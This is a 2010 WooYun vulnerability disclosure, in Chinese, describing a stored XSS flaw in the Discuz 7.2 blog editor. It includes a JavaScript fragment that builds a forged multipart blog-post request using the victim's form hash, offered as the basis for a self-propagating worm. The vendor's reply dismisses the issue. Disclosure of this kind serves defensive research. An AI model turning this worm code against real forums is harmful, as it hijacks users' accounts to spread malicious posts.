漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2010-0931
漏洞标题:Discuz 7.2 存储型XSS
相关厂商:Discuz!
漏洞作者: Liscker
提交时间:2010-12-11 11:09
修复时间:2010-12-14 11:05
公开时间:2010-12-14 11:05
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2010-12-11: 细节已通知厂商并且等待厂商处理中
2010-12-14: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
Discuz 7.2 存储型XSS,可编写蠕虫传播。
详细说明:
discuz 7.2 个人空间发表博客,默认管理员可编辑源码,但管理员可在后台设置权限允许普通用户编辑。
该处存在XSS弱点,可编写蠕虫进行传播。每个用户的表单hash值可在html获得,不需要考虑salt,获得cookie即可。
漏洞证明:
discuz 7.2 进行表单提交时每个用户的表单hash值不一样,但是固定的,该值可在访问用户的html中获得。如图:
然后将hash代入组包,编写蠕虫即可。
var userurl="http://demo.com/cp.php?ac=blog&blogid=&releas=2";
var fdata="-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"subject\"\n\n123\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"classid\"\n\n0\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"message\"\n\n<DIV>123</DIV>\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"tag\"\n\n\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"friend\"\n\n0\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"selectgroup\"\n\n\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"target_names\"\n\n\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"blogsubmit\"\n\ntrue\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"bbsis\"\n\n0\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"fid\"\n\n4\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"formhash\"\n\n9186ab85\n-----------------------------7da26139230652--\n";
xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------7da26139230652");
修复方案:
你们经验更丰富。
版权声明:转载请注明来源 Liscker@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2010-12-14 11:05
厂商回复:
后台用户组设置处:
日志全HTML标签支持处,已注明:
谨慎允许,支持所有html标签可能会造成javascript脚本引起的不安全因素 。
不认为这是一个漏洞。
漏洞Rank:3 (WooYun评价)
最新状态:
暂无